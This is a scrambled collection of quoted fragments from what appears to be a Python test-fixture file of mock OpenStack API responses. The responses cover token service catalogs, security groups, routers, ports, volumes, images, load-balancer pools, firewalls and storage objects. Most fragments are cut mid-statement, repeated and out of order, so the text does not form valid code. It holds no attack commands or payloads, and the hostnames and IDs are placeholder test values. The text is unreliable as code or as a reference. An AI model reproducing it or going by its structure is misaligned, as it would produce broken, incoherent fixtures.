"'marktwain', 'name': 'hello world'}] VOLUMES_IDS = [\"45baf976-c20a-4894-a7c3-c94b7376bf55\", \"5aa119a8-d25b-45a7-8d1b-88e127885635\"] SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS",
"[\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent",
"\"security_groups\": [ \"766110ac-0fde-4c31-aed7-72a97e78310b\" ], \"status\": \"DOWN\", \"tenant_id\": \"ANOTHER_PROJECT\" } ]} REMOVE_ROUTER_INTERFACE = {",
"} FIREWALL_LIST = { \"firewalls\": [ { \"status\": \"ACTIVE\", \"name\": \"fwass-test-1\", \"admin_state_up\": True,",
"1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, { \"id\": LBAAS_MEMBER_IDS[1], \"address\":",
"\"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ] VOLUMES_LIST = {",
"\"address\": \"10.0.0.123\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\":",
"this file except in compliance with the License. You may obtain # a",
"{ \"direction\": \"ingress\", \"ethertype\": \"IPv4\", \"id\": \"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None,",
"[ { \"hash\": \"451e372e48e0f6b1114fa0724aa7AAAA\", \"last_modified\": \"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[2]['name'], \"content_type\":\"application/octet-stream\" } ]",
"\"shared\": False, \"id\": FIREWALL_POLICY_IDS[0], \"description\": \"Testing firewall policy 1\" }, { \"name\": \"TestFireWallPolicy2\",",
"PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\": 25165824, \"status\":",
"or implied. See the # License for the specific language governing permissions and",
"\"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None, \"port_range_min\":",
"'access': { 'serviceCatalog': [{ 'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region':",
"\"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID },",
"None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name': u'volumebackup-01', u'object_count':",
"LBAAS_VIP_LIST = { \"vips\": [ { \"status\": \"ACTIVE\", \"protocol\": \"HTTP\", \"description\": \"\", \"address\":",
"FLOATING_IPS_IDS[1] } ] } LBAAS_HEALTHMONITOR_LIST = { \"health_monitors\": [ { \"admin_state_up\": True, \"tenant_id\":",
"\"name\": \"\", \"admin_state_up\": True, \"network_id\": \"9d83c053-b0a4-4682-ae80-c00df269ce0a\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\":",
"u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64',",
"\"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\":",
"\"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID },",
"\"insufficient_data_actions\": [ \"http://site:8000/nodata\" ], \"name\": \"SwiftObjectAlarm\", \"ok_actions\": [ \"http://site:8000/ok\" ], \"project_id\": \"c96c887c216949acbdfbd8b494863567\", \"repeat_actions\":",
"\"name\": \"fwass-test-1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[0], \"id\": FIREWALL_IDS[0], \"description\": \"\" },",
"\"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ] } ALARMS_LIST = [ { \"alarm_actions\": [ \"http://site:8000/alarm\"",
"} } ROUTER0_PORTS = { \"ports\": [ { \"status\": \"ACTIVE\", \"name\": \"\", \"admin_state_up\":",
"\"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0] }, { \"status\":",
"} SECGROUPS_LIST = { \"security_groups\": [ { \"description\": \"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\",",
"Name\": \"Apache1\" }, \"name\": \"new-server-test\", \"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\",",
"\"status\": \"available\", \"volume_type\": \"None\" } ] } SNAPSHOTS_LIST = { \"snapshots\": [ {",
"\"cirros-0.3.1-x86_64-uec\", \"owner\": PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\":",
"policy 1\" }, { \"name\": \"TestFireWallPolicy2\", \"firewall_rules\": [FIREWALL_RULE_IDS[1]], \"tenant_id\": PROJECT_ID, \"audited\": False, \"shared\":",
"\"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID } ] } FLOATING_IPS_LIST =",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\": \"IPv6\", \"id\": \"c0b09f00-1d49-4e64-a0a7-8a186d928138\", \"port_range_max\": None,",
"None, \"source_ip_address\": None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[0],",
"'exampleuser' } } } ROLE_LIST = {u'roles': [ {u'id': u'201c290919ec4d6bb350401f8b4145a3', u'name': u'heat_stack_owner'}, {u'id':",
"'https://orchestration0.cw-labs.net/v1' VOLUME_INTERNAL_ENDPOINT = 'http://internal:8776/v1/225da22d3ce34b15877ea70b2a575f58' IMAGE_INTERNAL_ENDPOINT = 'http://internal:9292' STORAGE_INTERNAL_ENDPOINT = 'http://internal:8080/v1/AUTH_ee5b90900a4b4e85938b0ceadf4467f8' NETWORK_INTERNAL_ENDPOINT = 'http://neutron.usr.lab0.aub.cw-labs.net:9696'",
"\"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\", \"links\": [ { \"href\": \"http://openstack.example.com/openstack/images/70a599e0-31e7-49b7-b260-868f441e862b\", \"rel\": \"bookmark\" } ]",
"= { \"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST =",
"None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, {",
"}, { \"status\": \"ACTIVE\", \"name\": \"fwass-test-2\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\":",
"None, \"destination_ip_address\": None, \"firewall_policy_id\": None, \"position\": None, \"destination_port\": \"80\", \"id\": FIREWALL_RULE_IDS[1], \"name\": \"\",",
"\"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\":",
"{u'id': u'edc12489faa74ee0aca0b8a0b4d74a74', u'name': u'Member'}, {u'id': u'6c3ceb6e6112486ba1465a636652b544', u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id':",
"{\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] }, { \"status\":",
"{ \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\", \"display_description\": \"Weekly backup\", \"volume_id\": \"76b8950a-8594-4e5b-8dce-0dfa9c696358\", \"status\": \"available\", \"size\":",
"\"10.0.0.122\", \"protocol_port\": 80, \"tenant_id\": PROJECT_ID, \"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member",
"True, \"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1]",
"\"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [ { \"subnet_id\":",
"] } IMAGES_LIST = { \"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\":",
"Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' % VOLUME_PUBLIC_ENDPOINT, u'rel': u'self'}], u'name':",
"from the Server PROJECT_SCOPED_TOKEN = { 'access': { 'serviceCatalog': [{ 'endpoints': [{ 'adminURL':",
"= [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON",
"\"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.126\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[1], \"id\": LBAAS_VIP_IDS[1], \"status_description\":",
"], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ] } NEUTRON_PORTS = { 'ports': ROUTER0_PORTS['ports']",
"{ 'endpoints': [{ 'adminURL': 'http://admin:8773/services/Admin', 'internalURL': 'http://internal:8773/services/Cloud', 'publicURL': 'http://public:8773/services/Cloud', 'region': 'RegionOne'}], 'endpoints_links': [],",
"\"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1] } ] }",
"\"ip_address\": \"10.0.0.1\" } ], \"id\": PORTS_IDS[0], \"device_id\": ROUTERS_IDS[1] } ] } NEUTRON_PORTS =",
"u'volumebackup-01', u'object_count': 22, u'size': 10, u'status': u'available', u'volume_id': u'45baf976-c20a-4894-a7c3-c94b7376bf55'} ] } ROUTERS_LIST =",
"u'2015-09-22T14:59:03.000000', u'description': u'A Volume Backup', u'fail_reason': None, u'id': u'803a2ad2-893b-4b42-90d9-eb5f09a8421a', u'links': [{u'href': '%s/backups/803a2ad2-893b-4b42-90d9-eb5f09a8421a' %",
"u'describedby', u'type': u'application/pdf'} ], u'media-types': [ {u'base': u'application/json', u'type': u'application/vnd.openstack.identity-v2.0+json'}, {u'base': u'application/xml', u'type':",
"\"2014-02-03T14:18:34.000000\", \"display_description\": \"\", \"display_name\": \"CirrOS v0.3.0\", \"id\": VOLUMES_IDS[1], \"metadata\": {}, \"size\": 1, \"snapshot_id\":",
"\"rel\": \"bookmark\" } ] }, \"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" },",
"None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID }, {",
"\"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"another_router\", \"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }]",
"u'2014-04-17T00:00:00Z' } } STORAGE_CONTAINERS = ['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'},",
"1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[1] } ] } FIREWALL_LIST =",
"\"tenant_id\": PROJECT_ID }, { \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\", \"name\": \"default\", \"security_group_rules\": [ {",
"\"la650123-e982-4552-9dec-5dc5d3ea4172\"] LBAAS_VIP_IDS = [\"616fb98f-36ca-475e-917e-1563e5a8cd10\", \"102fbcc3-d831-411d-a333-ddc828a7a9ed\"] LBAAS_HEALTHMONITOR_IDS = [\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] #",
"\"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\":",
"} ] } FIREWALL_RULE_LIST = { \"firewall_rules\": [ { \"protocol\": \"tcp\", \"description\": \"Firewall",
"\"\", \"accessIPv6\": \"\", \"addresses\": { \"private\": [ { \"addr\": \"192.168.0.3\", \"version\": 4 }",
"'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Compute Service', 'type':",
"'name': 'Image Service', 'type': 'image' }, { 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT,",
"1, \"snapshot_id\": None, \"source_volid\": None, \"status\": \"available\", \"volume_type\": \"None\" } ] } SNAPSHOTS_LIST",
"\"id\": \"8604a0de-7f6b-409a-a47c-a1cc7bc77b2e\", \"tenant_id\": \"2f245a7b-796b-4f26-9cf9-9e82d248fda7\", \"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = { \"networks\":",
"AUTH_URL_RESPONSE = { u'version': { u'id': u'v2.0', u'links': [ {u'href': u'%s' % AUTH_URL,",
"u'anotherrole'}] } STORAGE_CONTAINERS_LIST = [ { \"count\": 0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] },",
"[\"ca950223-e982-4552-9dec-5dc5d3ea4172\"] STACKS_IDS = [\"5c136348-5550-4ec5-8bd6-b83241844db3\", \"ec4083c1-3667-47d2-91c9-ce0bc8e3c2b9\"] UNBOUND_PORT_ID = \"abcdb45e-45fe-4e04-8704-bf6f58760000\" PRIVATE_PORT_IDS = [\"p7815f5b-a228-47bb-a5e5-f139c4f476ft\", \"p78o5f5t-a228-47bb-a5e2-f139c4f476ft\"] FIREWALL_RULE_IDS",
"\"links\": [ { \"href\": \"http://openstack.example.com/v2/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"self\" }, { \"href\": \"http://openstack.example.com/openstack/servers/05184ba3-00ba-4fbc-b7a2-03b62b884931\", \"rel\": \"bookmark\"",
"0, \"name\": STORAGE_CONTAINERS[0] }, { \"count\": 1, \"bytes\": 14, \"name\": STORAGE_CONTAINERS[1] } ]",
"} METERING_LABEL_LIST = { \"metering_labels\": [ { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test1\",",
"'endpoints': [{ 'adminURL': 'http://admin:8776/v1/225da22d3ce34b15877ea70b2a575f58', 'internalURL': VOLUME_INTERNAL_ENDPOINT, 'publicURL': VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name':",
"'Network Service', 'type': 'network' }, { 'endpoints': [{ 'adminURL': 'http://ceilometer.usr.lab0.aub.cw-labs.net:8777', 'internalURL': METERING_INTERNAL_ENDPOINT, 'publicURL':",
"SNAPSHOTS_IDS = [\"3fbbcccf-d058-4502-8844-6feeffdf4cb5\", \"e479997c-650b-40a4-9dfe-77655818b0d2\"] VOLUME_BACKUP_IDS = [\"803a2ad2-893b-4b42-90d9-eb5f09a8421a\"] ROUTERS_IDS = [\"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\", \"a9254bdb-2613-4a13-ac4c-adc581fba50d\"] PORTS_IDS =",
"\"progress\": 0, \"status\": \"ACTIVE\", \"tenant_id\": \"openstack\", \"updated\": \"2012-09-07T16:56:37Z\", \"user_id\": \"fake\" } ] }",
"\"521752a6-acf6-4b2d-bc7a-119f9148cd8c\", \"status\": \"available\", \"size\": 10, \"created_at\": \"2012-02-29T03:50:07Z\" }, { \"id\": SNAPSHOTS_IDS[1], \"display_name\": \"snap-002\",",
"} FIREWALL_RULE_LIST = { \"firewall_rules\": [ { \"protocol\": \"tcp\", \"description\": \"Firewall rule 1\",",
"\"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[0] }, { \"status\": \"ACTIVE\", \"lb_method\":",
"© 2014 Cloudwatt # # Licensed under the Apache License, Version 2.0 (the",
"\"ethertype\": \"IPv6\", \"id\": \"3c0e45ff-adaf-4124-b083-bf390e5482ff\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": None, \"remote_ip_prefix\":",
"'adminURL': 'http://admin:8080', 'internalURL': STORAGE_INTERNAL_ENDPOINT, 'publicURL': STORAGE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Object Storage",
"\"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\", \"id\":",
"\"tenant_id\": PROJECT_ID, \"firewall_policy_id\": FIREWALL_POLICY_IDS[1], \"id\": FIREWALL_IDS[1], \"description\": \"\" } ] } METERING_LABEL_LIST =",
"STORAGE_CONTAINERS_LIST = [ { \"count\": 0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] }, { \"count\":",
"\"2014-01-15T16:41:49.390270\", \"bytes\": 14, \"name\": STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\":",
"\"ACTIVE\", \"name\": \"\", \"admin_state_up\": True, \"network_id\": \"ebda9658-093b-41ba-80ce-0cf8cb8365d4\", \"tenant_id\": PROJECT_ID, \"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_gateway\",",
"\"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID }, { \"description\": \"default\", \"id\": \"12345678-1234-1234-1234-123456789012\",",
"} IMAGES_LIST = { \"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\",",
"test1\", \"name\": \"Meterlabel1\", \"id\": METERING_LABEL_IDS[0] }, { \"tenant_id\": PROJECT_ID, \"description\": \"Meter label test2\",",
"\"size\": 25, \"created_at\": \"2012-03-19T01:52:47Z\" } ] } VOLUME_BACKUPS_LIST = { u'backups': [ {u'availability_zone':",
"\"owner\": PROJECT_ID, \"properties\": { \"kernel_id\": \"4e150966-cbe7-4fd7-a964-41e008d20f10\", \"ramdisk_id\": \"482fbcc3-d831-411d-a073-ddc828a7a9ed\" }, \"protected\": False, \"size\": 25165824,",
"\"admin_state_up\": True, \"tenant_id\": \"6b96ff0cb17a4b859e1e575d221683d3\", \"id\": \"7177abc4-5ae9-4bb7-b0d4-89e94a4abf3b\" }] } ROUTER_CLEAR_GATEWAY = { \"router\": {",
"[], 'name': 'Metering service', 'type': 'metering' }, { 'endpoints': [{ 'adminURL': 'http://heat.usr.lab0.aub.cw-labs.net:8777', 'internalURL':",
"\"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:52\" }, { \"checksum\": \"69c33642f44ca552ba4bb8b66ad97e85\", \"container_format\": \"ari\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\":",
"\"id\": ROUTERS_IDS[0] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\": \"3c5bcddd-6af9-4e6b-9c3e-c153e521cab8\"}, \"name\": \"router1\", \"admin_state_up\": True,",
"\"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [ { \"ip_address\": \"10.0.0.4\", \"subnet_id\": \"51351eb9-7ce5-42cf-89cd-cea0b0fc510f\"",
"{u'href': u'%s' % AUTH_URL, u'rel': u'self'}, {u'href': u'http://docs.openstack.org/api/openstack-identity-service/2.0/content/', u'rel': u'describedby', u'type': u'text/html'}, {u'href':",
"\"description\": \"Custom Security Group\", \"id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"name\": \"custom\", \"security_group_rules\": [ { \"direction\": \"egress\",",
"}, { 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links':",
"\"remote_ip_prefix\": None, \"security_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"tenant_id\": PROJECT_ID } ], \"tenant_id\": PROJECT_ID }, { \"description\":",
"\"port_id\": \"3a44f4e5-1694-493a-a1fb-393881c673a4\", \"subnet_id\": \"a2f1f29d-571b-4533-907f-5803ab96ead1\" } NETWORKS_LIST = { \"networks\": [ { \"status\": \"ACTIVE\",",
"[ { \"admin_state_up\": True, \"allowed_address_pairs\": [], \"binding:capabilities\": { \"port_filter\": False }, \"binding:host_id\": \"\",",
"\"size\": 3714968, \"status\": \"active\", \"updated_at\": \"2014-02-03T14:13:53\" } ] } ALARMS_LIST = [ {",
"is distributed on an \"AS IS\" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF",
"= [ { \"count\": 0, \"bytes\": 0, \"name\": STORAGE_CONTAINERS[0] }, { \"count\": 1,",
"}, \"binding:host_id\": \"\", \"binding:vif_type\": \"unbound\", \"device_id\": \"\", \"device_owner\": \"compute:azerty\", \"extra_dhcp_opts\": [], \"fixed_ips\": [",
"u'name': u'ResellerAdmin'}, {u'id': u'7e9fd9336bc24936b3bbde15d1dd8f64', u'name': u'service'}, {u'id': u'972b51c620fe481e8e37682d8b5dbd1b', u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name':",
"\"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"egress\", \"ethertype\": \"IPv4\", \"id\":",
"\"rel\": \"bookmark\" } ] }, \"hostId\": \"16d193736a5cfdb60c697ca27ad071d6126fa13baeb670fc9d10645e\", \"id\": SERVERS_IDS[0], \"image\": { \"id\": \"70a599e0-31e7-49b7-b260-868f441e862b\",",
"}, \"mac_address\": \"fa:16:3e:4a:3a:a2\", \"fixed_ips\": [ { \"subnet_id\": \"aca4d43c-c48c-4a2c-9bb6-ba374ef7e135\", \"ip_address\": \"172.24.4.226\" } ], \"id\":",
"implied. See the # License for the specific language governing permissions and limitations",
"\"f7d45c89-008e-4bab-88ad-d6811724c51c\", \"port_range_max\": None, \"port_range_min\": None, \"protocol\": None, \"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\",",
"[{ 'id': 'edc12489faa74ee0aca0b8a0b4d74a74', 'name': 'Member'}], 'roles_links': [], 'username': 'exampleuser' } } } ROLE_LIST",
"\"router1\", \"admin_state_up\": True, \"tenant_id\": PROJECT_ID, \"id\": ROUTERS_IDS[1] }, { \"status\": \"ACTIVE\", \"external_gateway_info\": {\"network_id\":",
"\"2014-02-03T14:13:54\" }, { \"checksum\": \"c352f4e7121c6eae958bc1570324f17e\", \"container_format\": \"aki\", \"created_at\": \"2014-02-03T14:13:52\", \"deleted\": False, \"deleted_at\": None,",
"LBAAS_HEALTHMONITOR_IDS[0] } ] } LBAAS_VIP_LIST = { \"vips\": [ { \"status\": \"ACTIVE\", \"protocol\":",
"\"images\": [ { \"checksum\": \"f8a2eeee2dc65b3d9b6e63678955bd83\", \"container_format\": \"ami\", \"created_at\": \"2014-02-03T14:13:53\", \"deleted\": False, \"deleted_at\": None,",
"\"remote_group_id\": \"85cc3048-abc3-43cc-89b3-377341426ac5\", \"remote_ip_prefix\": None, \"security_group_id\": \"12345678-1234-1234-1234-123456789012\", \"tenant_id\": PROJECT_ID }, { \"direction\": \"ingress\", \"ethertype\":",
"= ['janeausten', 'marktwain'] STORAGE_OBJECTS = [{'container': 'janeausten', 'name': 'foo'}, {'container': 'janeausten', 'name': 'bar'},",
"u'name': u'admin'}, {u'id': u'9c3698e2f6a34d59b45d969d78403942', u'name': u'heat_stack_user'}, {u'id': u'9fe2ff9ee4384b1894a90878d3e92bab', u'name': u'_member_'}, {u'id': u'b6673106f5c64c0cbc1970ad706d38c0', u'name':",
"\"protocol\": \"HTTP\", \"description\": \"\", \"address\": \"10.0.0.125\", \"protocol_port\": 80, \"port_id\": PRIVATE_PORT_IDS[0], \"id\": LBAAS_VIP_IDS[0], \"status_description\":",
"STORAGE_OBJECTS[0]['name'], \"content_type\":\"application/octet-stream\" }, { \"hash\": \"ed076287532e86365e841e92bfc50d8c\", \"last_modified\": \"2014-01-15T16:37:43.427570\", \"bytes\": 12, \"name\": STORAGE_OBJECTS[1]['name'], \"content_type\":\"application/octet-stream\"",
"{ \"attachments\": [], \"availability_zone\": \"nova\", \"bootable\": \"false\", \"created_at\": \"2014-02-03T14:22:52.000000\", \"display_description\": None, \"display_name\": \"toto\",",
"VOLUME_PUBLIC_ENDPOINT, 'region': 'RegionOne'}], 'endpoints_links': [], 'name': 'Volume Service', 'type': 'volume' }, { 'endpoints':",
"{ \"floatingips\": [ { \"router_id\": \"d23abc8d-2991-4a55-ba98-2aaea84cc72f\", \"tenant_id\": PROJECT_ID, \"floating_network_id\": \"376da547-b977-4cfe-9cba-275c80debf57\", \"fixed_ip_address\": \"10.0.0.3\", \"floating_ip_address\":",
"\"admin_state_up\": True, \"weight\": 1, \"status\": \"ACTIVE\", \"status_description\": \"member test1\", \"pool_id\": LBAAS_POOL_IDS[0] }, {",
"= { \"pools\": [ { \"status\": \"ACTIVE\", \"lb_method\": \"ROUND_ROBIN\", \"protocol\": \"HTTP\", \"description\": \"\",",
"Service', 'type': 'image' }, { 'endpoints': [{ 'adminURL': 'http://admin:8774/v2/225da22d3ce34b15877ea70b2a575f58', 'internalURL': COMPUTE_INTERNAL_ENDPOINT, 'publicURL': COMPUTE_PUBLIC_ENDPOINT,",
"[\"he717f53-3707-49b9-9dd0-fd063e6lbass\"] LBAAS_POOL_IDS = [\"lb815f5b-a228-17bb-a5e5-f139c3e476f6\", \"dlb15f5b-a228-47bb-a5e5-f139c4e47po6\"] # Simulating JSON sent from the Server PROJECT_SCOPED_TOKEN",
"\"name\": \"Test-Pools\", \"health_monitors_status\": [], \"members\": [], \"provider\": \"haproxy\", \"status_description\": None, \"id\": LBAAS_POOL_IDS[1] }",
"\"binding:vif_type\": \"ovs\", \"device_owner\": \"network:router_interface\", \"binding:capabilities\": { \"port_filter\": False }, \"mac_address\": \"fa:16:3e:2d:dc:7e\", \"fixed_ips\": [",
